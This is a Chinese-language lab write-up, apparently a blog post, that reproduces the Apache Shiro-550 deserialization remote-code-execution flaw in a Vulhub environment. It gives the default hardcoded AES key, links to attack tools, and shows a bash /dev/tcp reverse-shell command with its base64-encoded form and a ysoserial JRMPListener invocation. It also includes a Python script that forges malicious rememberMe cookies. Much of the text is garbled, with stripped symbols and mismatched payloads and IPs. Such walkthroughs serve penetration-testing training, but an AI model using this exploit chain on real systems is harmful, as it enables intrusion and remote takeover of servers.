多种五屏网站建设,模拟网站建设软件,网页即时聊天,做网站要用到哪些架包#x1f36c; 博主介绍#x1f468;#x1f393; 博主介绍#xff1a;大家好#xff0c;我是 hacker-routing #xff0c;很高兴认识大家~
✨主攻领域#xff1a;【渗透领域】【应急响应】 【Java、PHP】 【VulnHub靶场复现】【面试分析】
#x1f389;点赞➕评论➕收… 博主介绍 博主介绍大家好我是 hacker-routing 很高兴认识大家~
✨主攻领域【渗透领域】【应急响应】 【Java、PHP】 【VulnHub靶场复现】【面试分析】
点赞➕评论➕收藏 养成习惯一键三连
欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋
作者水平有限欢迎各位大佬指点相互学习进步 目录
0x1 前言
0x2 漏洞原理
0x3 靶场搭建
1、环境准备
2、漏洞复现
shiro_attack工具
BurpShiroPassiveScan.jar插件
构造cookie反弹shell
0x4 总结
漏洞修复 0x1 前言
Shiro-550反序列化漏洞大约在2016年就被披露了但感觉直到近一两年在各种攻防演练中这个漏洞才真正走进了大家的视野Shiro-550反序列化应该可以算是这一两年最好用的RCE漏洞之一原因有很多Shiro框架使用广泛漏洞影响范围广攻击payload经过AES加密很多安全防护设备无法识别/拦截攻击……
0x2 漏洞原理
根据漏洞描述Shiro≤1.2.4版本默认使用CookieRememberMeManager其处理cookie的流程是
先获取cookie中的remberMe值 -- 对其base64解码 -- AES解码 -- 对解密的值反序列化然而AES的密钥是硬编码的就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞
payload 构造的顺序则就是相对的反着来
构造恶意命令 -- 序列化 -- AES加密 -- base64编码 -- 发送cookie值
在整个漏洞利用过程中比较重要的是AES加密的密钥该秘钥默认是默认硬编码的所以如果没有修改默认的密钥就自己可以生成恶意构造的cookie了。
给师傅们分享一个我很喜欢的博主画的理解图这个还是很形象地展示了黑客攻击的流程。 0x3 靶场搭建
1、环境准备
centos192.168.103.200搭建靶场环境先下载docker然后利用docker安装vulhubkali192.168.103.129攻击机用于接收靶机的反弹shell的
利用docker-compose启动靶场环境
docker-compose up -d在查看下镜像以及端口
docker ps然后浏览器访问192.168.103.161:8080/得到下面的界面 2、漏洞复现
我们先利用burp抓个登录包给大家看看rememberme字段是什么再让大家更加好理解这个shiro漏洞。勾选记住密码选项后点击登录抓包观察请求包中是否有rememberme字段响应包中是否有Set-cookie:rememberMedeleteMe字段。类似于下图这样 我看了很多CSDN博主写的判断其是否有shiro漏洞总结分析如下 未登陆的情况下请求包的cookie中没有rememberMe字段返回包set-Cookie里也没有deleteMe字段 登陆失败的话不管勾选RememberMe字段没有返回包都会有rememberMedeleteMe字段 不勾选RememberMe字段登陆成功的话返回包set-Cookie会有rememberMedeleteMe字段。但是之后的所有请求中Cookie都不会有rememberMe字段 勾选RememberMe字段登陆成功的话返回包set-Cookie会有rememberMedeleteMe字段还会有rememberMe字段之后的所有请求中Cookie都会有rememberMe字段 shiro_attack工具
对于shiro550其漏洞的核心成因是cookie中的身份信息进行了AES加解密用于加解密的密钥应该是绝对保密的但在shiro版本1.2.24的版本中使用了固定的密钥。
因此验证漏洞的核心应该还是在于我们攻击者可否获得这个AES加密的密钥如果确实是固定的密钥kPHbIxk5D2deZiIxcaaaA或者其他我们可以通过脚本工具爆破出来的密钥那么shiro550漏洞才一定存在。
我们利用shiro_attack工具进行图形化的分析下面是这个工具的下载地址
链接https://pan.baidu.com/s/1C408FR_n1t-XbIlbPLNczw?pwdpso6
提取码pso6 利用java -jar 启动里面的.jar文件
java -jar shiro_attack-2.2.jar我们可以看到这个图形化的工具就很清楚检测出这个url存在shiro框架并且还爆破出来了shiro550的迷人AES加密的key值kPHbIxk5D2deZiIxcaaaA这样就可以证明这个url存在shiro漏洞。 我们还可以进行命令执行等操作 BurpShiroPassiveScan.jar插件
我们还可以直接使用burp的抓包工具里面的插件下面是下载链接
百度网盘下载
https://pan.baidu.com/s/1LFRF34kHKG5LljboSpjSkA
提取码j43f我们直接在burp里面添加这个插件 当BurpSuite抓取到Shiro的数据包时会自动进行检测Key当发现存在Shiro默认key时会有相应的告警 构造cookie反弹shell
1、
先kali监听
┌──(rootkali)-[~]
└─# nc -lvnp 6666 然后我们先利用kali攻击机搭建VPS服务存放反弹shell的payload1IP为kali的IP地址
bash -i /dev/tcp/192.168.103.129/6666 01当命令中包含重定向 ’ ’ ’ ’ 和管道符 ’ | ’ 时需要进行 base64 编码绕过检测。可以使用在线网站对命令进行编码网址为
Runtime.exec Payload Generater | AresXs Blog 得到的编码结果如下
bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjEwMy4xMjkvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}2、
接下来我们利用序列化工具ysoserial.jar工具下载开始的百度网盘里面有生成payload命令如下
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 7777 CommonsCollections5 bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjEwMy4xMjkvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}java -cp ysoserial.jar: 这部分指示 Java 运行一个程序并通过 -cp 参数设置了 classpath告诉 Java 解释器在哪里可以找到 ysoserial.jar 文件以及它所依赖的其他类。ysoserial.jar 包含了 ysoserial 工具的代码和依赖项。ysoserial.exploit.JRMPListener 7777: 这是执行的 Java 类和它的参数。ysoserial.exploit.JRMPListener 是 ysoserial 中一个用于创建 JRMPJava Remote Method Protocol监听器的类。7777 是监听器将侦听的端口号。这个监听器将会等待远程 Java 应用程序连接到它并利用反序列化漏洞。CommonsCollections5: 这是 ysoserial 中内置的一个 payload利用了 Apache Commons Collections 库中的反序列化漏洞。CommonsCollections5 是 ysoserial 中的一种预定义 payload 类型表示使用的是该库中的第五种利用方式。bash -c {echo,CmJhc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4yMDAuMTMxLzY2NjYgMD4mMQ}|{base64,-d}|{bash,-i}: 这是 payload 的一部分它会在成功利用漏洞后在目标系统上执行的命令。这个命令是一个经过 base64 编码的字符串它的含义是将 bash 的标准输入连接到一个通过 base64 解码后执行的命令。解码后的命令是 bash -c bash -i /dev/tcp/192.168.200.131/6666 01它的作用是在目标系统上执行一个反向 shell将 shell 的输入和输出重定向到指定的 IP 地址和端口这样攻击者就可以远程控制目标系统。 3、
我们接下来进行AES加密 — base64加密 — 然后生成rememberMe字段
import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command):popen subprocess.Popen([java, -jar, ysoserial.jar, JRMPClient, command], stdoutsubprocess.PIPE)BS AES.block_sizepad lambda s: s ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()key base64.b64decode(kPHbIxk5D2deZiIxcaaaA)iv uuid.uuid4().bytesencryptor AES.new(key, AES.MODE_CBC, iv)file_body pad(popen.stdout.read())base64_ciphertext base64.b64encode(iv encryptor.encrypt(file_body))return base64_ciphertextif __name__ __main__:payload encode_rememberme(sys.argv[1])
print rememberMe{0}.format(payload.decode())代码中的keykPHbIxk5D2deZiIxcaaaA我们开始利用shiro-atack工具进行破解出来了而且shiro≤1.2.4的版本中默认的AES加密的key都是这个注意shiro.py的位置应当保证和ysoserial.jar在同一目录下。 这样我们就生成了请求包中rememberMe的payload2
┌──(rootkali)-[~/桌面/Shiro_exploit-master]
└─# python2 shiro.py 192.168.103.129:7777rememberMeDWUCimV9QwmfgBsoknr9X8dwZpvTzjuT7SHs69IYVjQhnFQMU9Uc87kTwI0BlqoBxxywURBNtJ/VEJa5avi3yLLwPCX7x0zwTGNrNsbOIglcGnipCVlKt03MAl1GcYxi5ophKZ6Dmz6tX7pPedEve3gzShL9SYVSjUrxfAZJwoAbb45DsY56CSiLEq4iDPutCU7OK36BbIbIz1XBxlQxU820RmAzepiDiz3y/gXjpG40bAoOoPFFHPg9IulM5cEHMhhsOnxDwpXjjwGyx564xomDrF5gMcOnA7qsFiOBRQFF4HKeIhFC8TPfhk2T629TjXufAkCac0KOUgPngbP3FBc7bMncKLdNQNqMZYBrSqisvyOEwF/Cdm8YqMBySyeXoIYIQ51CXvnH7BNSxw 4、
更改请求包中cookie的rememberMe字段 我们要在这个数据包的Cookie字段后添加rememberMe字段。
然后点击发送go返回如下可以看到响应包中的rememberMedeleteMe字段 5、
这样应该就应该漏洞利用成功了我们看一下刚才JRMP监听的端口可以看到这个服务与靶机192.168.103.129进行了连接通信 成功反弹shell然后可以进行执行后台命令了。 0x4 总结
漏洞修复
及时升级shiro版本不再使用固定的密钥加密。在应用程序上部署防火墙、加强身份验证等措施以提高安全性
给大家分享一个哔哩哔哩的大佬的视频
【Shiro反序列化漏洞(一)-shiro550流程分析】 Shiro反序列化漏洞(一)-shiro550流程分析_哔哩哔哩_bilibili
